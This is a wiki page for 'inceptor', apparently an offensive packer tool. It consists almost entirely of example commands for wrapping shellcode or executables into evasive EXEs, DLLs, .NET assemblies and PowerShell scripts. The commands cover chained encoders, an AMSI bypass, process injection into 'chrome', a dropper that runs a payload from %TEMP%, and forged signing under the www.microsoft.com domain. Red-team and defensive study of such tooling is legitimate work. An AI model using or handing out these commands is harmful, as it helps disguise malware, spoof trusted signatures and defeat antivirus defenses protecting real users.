Examples by scenario
klezVirus edited this page Sep 21, 2021 · 1 revision
This page is a scenario-based reference for anyone learning how to use inceptor and wanting to get the most out of it.
python inceptor.py native shellcode.raw -o packed.exe
python inceptor.py native shellcode.raw -o packed.dll
python inceptor.py native shellcode.raw -o packed.dll -C clang
Packing of raw shellcode into a native DLL, using an external definition file for the exported functions (avoids name mangling)
python inceptor.py native shellcode.raw -o packed.dll --exports ".\exports.def"
Packing of raw shellcode into a native EXE, plus compilation of a "dropper" DLL. In the example below, the dropper DLL writes the file packed.exe into %TEMP%, then executes it via system("%TEMP%\packed.exe").
python inceptor.py native shellcode.raw -o packed.exe --dll
python inceptor.py native shellcode.raw -o packed.exe --sgn
python inceptor.py native shellcode.raw -o packed.exe -e nop -e xor
python inceptor.py native shellcode.raw -o packed.exe --clone "C:\Windows\System32\cmd.exe"
Packing of raw shellcode into a native EXE, signing the binary using CarbonCopy with the www.microsoft.com domain
python inceptor.py native shellcode.raw -o packed.exe -s -sd www.microsoft.com
Packing of raw shellcode into a native EXE, signing the binary with LazySign and the www.microsoft.com domain
python inceptor.py native shellcode.raw -o packed.exe -s -sd www.microsoft.com -so
python inceptor.py native shellcode.raw -o packed.exe -s -sd www.microsoft.com -s -ss "C:\Windows\system32\ntdll.dll"
python inceptor.py native to_pack.exe -o packed.exe -t pe2sh
python inceptor.py native to_pack.exe -o packed.exe -t donut -P
Packing of an EXE into a native EXE using donut, with process injection templates, telling the loader to inject into "chrome"
python inceptor.py native to_pack.exe -o packed.exe -t donut -P -P0 chrome
python inceptor.py native to_pack.exe -o packed.exe --classname Namezpace.Clazz --function meth
Most of the examples above can also be used with the DotNet generator.
python inceptor.py dotnet to_pack.exe -o packed.exe -m dinvoke -m amsi
python inceptor.py dotnet to_pack.exe -o packed.exe -O
Packing an EXE as a full .NET assembly (to be reflectively loaded via Assembly.Load) into another .NET binary, using a chain of LD encoders
python inceptor.py dotnet to_pack.exe -o packed.exe -e xor -e aes -e hex
[*] Multiple compatible templates identified, choose one:
0: assembly_load.cs
1: classic.cs
$> 1
Wrapping an EXE as a full .NET assembly (to be reflectively loaded via Assembly.Load) into another .NET binary, using a chain of LD encoders
python inceptor.py powershell to_pack.exe -o packed.ps1 -e xor -e aes -e hex
python inceptor.py dotnet to_pack.exe -o packed.exe -O -m amsi